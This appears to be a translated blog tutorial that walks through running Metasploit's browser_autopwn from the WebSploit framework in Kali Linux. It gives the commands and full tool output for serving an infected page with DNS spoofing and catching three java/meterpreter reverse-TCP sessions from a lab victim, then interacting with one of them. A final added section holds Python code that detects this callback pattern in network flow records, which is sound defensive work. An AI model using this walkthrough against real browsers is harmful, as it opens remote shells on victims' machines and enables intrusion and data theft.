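This works on the same principle as the previous post; it is just one more way to go about it: using websploit in Kali to invoke the msf module for the attack.
1. Open websploit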
root@kali:~# websploit
WARNING: No route found for IPv6 destination :: (no default route?)
__ __ __ ___ __
/\ \ __/\ \ /\ \ /\_ \ __/\ \__
\ \ \/\ \ \ \ __\ \ \____ ____ _____\//\ \ ___ /\_\ \ ,_\
\ \ \ \ \ \ \ /'__`\ \ '__`\ /',__\/\ '__`\\ \ \ / __`\/\ \ \ \/
\ \ \_/ \_\ \/\ __/\ \ \L\ \/\__, `\ \ \L\ \\_\ \_/\ \L\ \ \ \ \ \_
\ `\___x___/\ \____\\ \_,__/\/\____/\ \ ,__//\____\ \____/\ \_\ \__\
'\/__//__/ \/____/ \/___/ \/___/ \ \ \/ \/____/\/___/ \/_/\/__/
\ \_\
\/_/
--=[WebSploit FrameWork
+---**---==[Version :2.0.5 BETA
+---**---==[Codename :We're Not Crying Wolf
+---**---==[Available Modules : 19
--=[Update Date : [r2.0.5-000 2.3.2014]
wsf > show modules
2. List all modules
wsf > show modules
Web Modules                   Description
----------------------------------------
web/apache_users              Scan Directory Of Apache Users
web/dir_scanner               Directory Scanner
web/wmap                      Information Gathering From Victim Web Using (Metasploit Wmap)
web/pma                       PHPMyAdmin Login Page Scanner
web/cloudflare_resolver       CloudFlare Resolver
Network Modules               Description
----------------------------------------
network/arp_dos               ARP Cache Denial Of Service Attack
network/mfod                  Middle Finger Of Doom Attack
network/mitm                  Man In The Middle Attack
network/mlitm                 Man Left In The Middle Attack
network/webkiller             TCP Kill Attack
network/fakeupdate            Fake Update Attack Using DNS Spoof
network/arp_poisoner          Arp Poisoner
Exploit Modules               Description
----------------------------------------
exploit/autopwn               Metasploit Autopwn Service
exploit/browser_autopwn       Metasploit Browser Autopwn Service
exploit/java_applet           Java Applet Attack (Using HTML)
Wireless / Bluetooth Modules  Description
----------------------------------------
wifi/wifi_jammer              Wifi Jammer
wifi/wifi_dos                 Wifi Dos Attack
wifi/wifi_honeypot            Wireless Honeypot(Fake AP)
bluetooth/bluetooth_pod       Bluetooth Ping Of Death Attack
3. Select the browser_autopwn module and configure its parameters
wsf > use exploit/browser_autopwn
wsf:Browser_Autopwn > show options
Options     Value         RQ    Description
-----------------------------------------
Interface   eth0          yes   Network Interface Name
LHOST       192.168.1.1   yes   Local IP Address
wsf:Browser_Autopwn > set LHOST 192.168.73.128
INTERFACE => 192.168.73.128
4. Run the attack
wsf:Browser_Autopwn > run
[*]Starting WebServer ... Please Wait ...
[*]Configuration DNS Spoof ...
[*]Creating Infected Page For Victim ...
[*]Engine Has Been Started.
[!] ************************************************************************
[!] * The utility msfcli is deprecated! *
[!] * It will be removed on or about 2015-06-18 *
[!] * Please use msfconsole -r or -x instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/3802 *
[!] ************************************************************************
[*] Initializing modules...
LHOST => 192.168.73.128
URIPATH => index
[*] Auxiliary module execution completed
[*] Setup
[*] Obfuscating initial javascript 2015-04-23 22:13:34 -0400
[*] Done in 1.020195799 seconds
msf auxiliary(browser_autopwn) >
[*] Starting exploit modules on host 192.168.73.128...
[*] ---
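As you can see, the msf module is now being invoked; the automatic processing that follows is the same as when the attack is run directly from msf.
..................................remaining output omitted.................................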
[*] Starting the payload handler...
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse handler on 192.168.73.128:6666
[*] Starting the payload handler...
[*] Started reverse handler on 192.168.73.128:7777
[*] Starting the payload handler...
[*] --- Done, found 21 exploit modules
[*] Using URL: https://0.0.0.0:8080/index
[*] Local IP: https://192.168.73.128:8080/index
[*] Server started.
5. Visit the URL given above [https://192.168.73.128:8080/index]
[*] Session ID 1 (192.168.73.128:7777 -> 192.168.73.1:51084) processing InitialAutoRunScript 'migrate -f'
[*] Session ID 2 (192.168.73.128:7777 -> 192.168.73.1:51085) processing InitialAutoRunScript 'migrate -f'
[*] Session ID 3 (192.168.73.128:7777 -> 192.168.73.1:51086) processing InitialAutoRunScript 'migrate -f'
msf auxiliary(browser_autopwn) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter java/java tt @ liuxin 192.168.73.128:7777 -> 192.168.73.1:51084 (192.168.73.1)
2 meterpreter java/java tt @ liuxin 192.168.73.128:7777 -> 192.168.73.1:51085 (192.168.73.1)
3 meterpreter java/java tt @ liuxin 192.168.73.128:7777 -> 192.168.73.1:51086 (192.168.73.1)
6. Select a session
msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > ipconfig
Interface 1
============
Name : lo - Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
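Seen from the defender's side, the session list above has a recognisable network shape: one client loads a page from a host on port 8080 and moments later opens several TCP connections to another port (7777) on that same host. The following is an added example, not part of the original post, that flags this pattern in flow records; the record format, the 30-second window and the alert threshold are assumptions, and the sample flows are constructed from the addresses shown above.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed flow records: time, client, client port, server, server port.
# Addresses and ports mirror the transcript above; the timestamps are invented.
SAMPLE_FLOWS = """\
2015-04-23T22:15:01 192.168.73.1 51080 192.168.73.128 8080
2015-04-23T22:15:04 192.168.73.1 51084 192.168.73.128 7777
2015-04-23T22:15:05 192.168.73.1 51085 192.168.73.128 7777
2015-04-23T22:15:05 192.168.73.1 51086 192.168.73.128 7777
2015-04-23T22:16:10 192.168.73.1 51090 192.168.73.50 443
2015-04-23T22:20:00 192.168.73.7 40000 192.168.73.128 8080
"""

WEB_PORTS = {80, 443, 8080}      # assumption: ports treated as a page fetch
WINDOW = timedelta(seconds=30)   # assumption: how soon a callback must follow
MIN_CALLBACKS = 2                # assumption: callbacks needed before alerting


def parse(text):
    """Yield (time, client, server, server_port) from whitespace-separated lines."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue  # skip blank or malformed records
        ts, client, _client_port, server, server_port = parts
        yield datetime.fromisoformat(ts), client, server, int(server_port)


def find_callbacks(text):
    """Return alerts for clients that fetch a page from a server and then open
    MIN_CALLBACKS or more connections to a non-web port on that same server."""
    last_fetch = {}                  # (client, server) -> time of last page fetch
    callbacks = defaultdict(list)    # (client, server, port) -> connection times
    for ts, client, server, port in sorted(parse(text)):
        pair = (client, server)
        if port in WEB_PORTS:
            last_fetch[pair] = ts
        elif pair in last_fetch and ts - last_fetch[pair] <= WINDOW:
            callbacks[(client, server, port)].append(ts)
    return [
        {"client": c, "server": s, "port": p, "count": len(times)}
        for (c, s, p), times in sorted(callbacks.items())
        if len(times) >= MIN_CALLBACKS
    ]
```

On the sample flows this reports 192.168.73.1 making three connections to 192.168.73.128:7777, while the client that only loaded the page raises no alert.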